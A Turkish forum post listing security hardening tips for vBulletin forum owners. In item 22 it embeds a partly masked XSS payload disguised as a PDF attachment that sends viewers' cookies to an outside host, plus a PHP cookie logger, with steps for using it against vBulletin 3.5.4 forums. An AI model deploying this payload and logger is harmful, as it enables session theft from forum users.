vBulletin Güvenlik Açıkları ve Kapatma Yöntemleri | Webmaster Forumu | Sosyal Medya Forumu | MaxiForum ツ
Neler Yeni

vBulletin Güvenlik Açıkları ve Kapatma Yöntemleri

Reklam Alanı
Reklam Alanı

MaxiForum Konu Bilgileri

Konu Hakkında tarihinde vBulletin Destek kategorisinde Jerry tarafından oluşturulan vBulletin Güvenlik Açıkları ve Kapatma Yöntemleri başlıklı konuyu okuyorsunuz. Bu konu şimdiye dek 41 kez görüntülenmiş, 0 yorum ve 0 tepki puanı almıştır...
Kategori Adı vBulletin Destek
Konu Başlığı vBulletin Güvenlik Açıkları ve Kapatma Yöntemleri
Konuyu başlatan Jerry
Başlangıç tarihi
Cevaplar
Görüntüleme
ALDIĞI BEĞENİ
Son Mesaj Yazan Jerry

Jerry

Moderatör
Katılım
21 Şub 2020
Mesajlar
972
Yaş
20
Nereden
Yurtdışı
Cinsiyet
Erkek
Sosyal Ağ
İnstagram
Aldığı Beğeni
11
1- İLk olarak her zaman için forumunuzu son çıkan vbulletin sürümüne upgrade edin daha güvenlidir.
2-Herhangi bi eklentide php dosyası veya php dosyalarında editleme varsa iyice dikkat edin sonradan açık teşkil edebilir.
3-Ftp nize girin ve tüm dosyalarının chmod değerlerinin 777 olmamasına dikkat edin çünkü fso ile serverınıza girilirse hacklenmeyin adam yazma hakkı bulamaz kurtulmuş olursunuz.
4- Config.php dosyanızı mutlaka kriptolayınki herhangi bi fso ile girildiğinde sql bağlantı için kimse okuyamasın.
5- Eğer phpmyadmin kullanıyorsanız phpmyadmin adresinizin şifreli olduğundan emin olun değilse şifreleyin.
6- Admincp ve modcp klasörlerinizin ismini değiştirin vede şifreleyin o klasörleri.
7-Çok basit şifreler kullanmayın şifrelerinizde &%+/ gibi özel karekterlerin olmasına özen gösterin
8-Trojen yerseniz mutlaka hemen format atın ve tüm ftp +panel v.s şifrelerinizi değiştirin
9-Forumu kurduktan sonra mutlaka install klasörünü silin sadece install.php yi değil zaten herhangi bir işlevi olmıyan klasör komple silin ileriki zamanlarda açık teşkil etmesin.
10-Mutlaka hergün sitenizin yedeğini alın herhangi bi sorunla karşılaşırsanız yedeği geri yükleyip ufak bir zararla atlatırsınız.
11- Calender(Takvim) i silin biri oraya Hacked by ** gibisinden bişeyler ekliyerek lamerlik yapabilir.
12-Shoutbox kullanıyorsanız mutlaka html ve images ları kapatın bunlar açık teşkil ediyorlar.
13-Eğer yedeği ftp nize yollayıp ordan bilgisayarınıza çekiyorsanız yedek aldıktan sonra mutlaka ftp nizden silin çünkü yedek alınması için klasörün chmod u 777 dir ve isteyen herkez yedeği bilgisayarına indirebilir.

14- imzada html kodlarını kapatın bu yöntemle xss veya yönlendirme yapılabilir.
15- Üye olurken mutlaka resim doğrulaması olsun eğer hostunuzdan doğan bir image sorunu varsa herhangi zorunlu bir ek bilgi ekleyinki siteniz flood saldırısına maruz kalmasın.
16- Herhangi bi konuda TIKLA gibisinden yazılara direk tıklamayın önce sağ tıklayıp özelliklerden linke bakın ondan sonra tıklayın.
17-Özel mesajlarda çok özelliğin açık olmasına gerek yok cookieslerinizin güvenliği açısından özel mesajdaki özellikleri kapatın image v.s
18-Yeni kullanıcı grup eklerken bu uye grubu halka acık olsunmu seçeneğini mutlaka hayır yapın diğer kullanıcılar bu grubu seçemesin.
19-Eğer null sürüm kullanıyorsanız dosyalara dikkat edin null iken kişi sizin bilgilerinize ulaşmak için açık kapı bırakmış olabilir ör: 3.5.3 sürümündeki sm-check.php dosyası.
20-eğer topx kullanıyor kullanıyorsanız yönlendirme yemediğinden emin olun herhangi biri indexine yönlendirebilir [Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...] örneğin burdaki kod o yüzden eğer topx iniz yönlendirme yiyosa yönlendirme kodundaki kelimeleri sansürleyin vede en garanti yol olarak açıksız topx ler var onu kullanın
21-Eğer toplistinizi eklenti olarak kullanıyosanız html kodlarının kapalı olmasına dikkat edin çünkü yönlendirme koduyla indexe yönlendirilebilir.
22- Gelelim eklentiden doğan xss açığına
Notepad ile yeni bir dosya açıp aşağıdaki kodu içine yapıştırın ve testmagic.pdf olarak kaydedin.


Code:

**
d o c u m e n t.write('<img src=" adresiniz/c.php?c='+****.cookie+'" WIDTH=0 HEIGHT=0>');
****.****.href=" ";
</script>
Aşağıdakini de c.php olarak kaydedip bir host a atın.



Code:

<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("m/d/Y g:i:s a");
$referer= getenv ('HTTP_REFERER');
$fl = fopen('megalog.txt', 'a');
fwrite($fl, "\n".$ip.' :: '.$date."\n".$referer."\n".$cookie."\n");
fclose($fl);
?>
Nasıl kullanılacağına geçelim :

vbulletin 3.5.4 kullanan bir foruma üye olup mesajımızı yazıyoruz. daha sonra yazdığımız mesaja testmagic.pdf i ekliyoruz. eğer o sitede açık varsa mesajı gören kullanıcıların cookie si hostunuzdaki log.txt e kaydedilecek.

Kodlardaki bazı adresler yerine biliyorsunuz ki kendi adreslerinizi yazacaksınız.Bu açık sadece IE kullananlarda geçerlidir.

işte eklentiden doğan xss açığı böyle kapatmak için pdf türü eklentiyi silmelisiniz.

23-Diğer vbulletin toplist açığıda şöyle
 

Dikkat:

vBulletin ve XenForo kategorilerinde özel mesaj ile destek talep etmeyiniz! Bu tür taleplerinizin cevapsız kalacağını belirtmek isteriz. Destek talepleriniz için konu açmanız yeterlidir.

Konuyu Görüntüleyenler: (Üye: 0, Misafir: 1)

Benzer konular


Reklam Alanı
Reklam Alanı
Üst